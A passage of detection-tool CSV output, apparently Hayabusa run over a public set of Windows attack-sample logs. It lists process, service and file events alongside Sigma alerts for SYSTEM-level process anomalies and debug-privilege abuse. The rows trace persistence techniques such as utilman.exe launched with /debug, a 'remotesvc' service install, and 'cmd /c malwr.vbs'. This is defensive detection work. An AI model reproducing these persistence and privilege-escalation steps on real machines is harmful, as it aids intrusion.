Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:21.929 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:41:29.008 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-19 17:22:24.761 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:22:24.851 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:22:24.901 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:22:40.373 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:26:03.585 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:26:05.628 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:31:03.687 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:36:03.788 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:03.890 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:08.777 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:08.967 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:08.977 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:09.828 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 365ABB72-29B5-5C91-0000-0010BE04C408",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:42:05.859 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.238 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.458 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.699 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.719 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.759 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.909 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.909 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.919 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.929 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:12.931 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:13.151 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:13.181 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:13.221 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.232 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 365ABB72-5290-5C91-0000-00104C100100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.563 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.603 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.933 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.933 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.094 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.144 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.144 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.144 +00:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.144 +00:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.154 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-52B4-5C91-0000-0010C25D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.154 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.424 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.424 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.424 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.454 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.454 +00:00,PC01.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.514 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.514 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.795 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.795 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.835 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 365ABB72-532B-5C91-0000-00100EB40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.835 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.865 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.885 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.885 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.915 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 365ABB72-5366-5C91-0000-00109FCD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.915 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.995 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.995 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.065 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.135 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 365ABB72-53A2-5C91-0000-001093E70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.135 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.406 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: 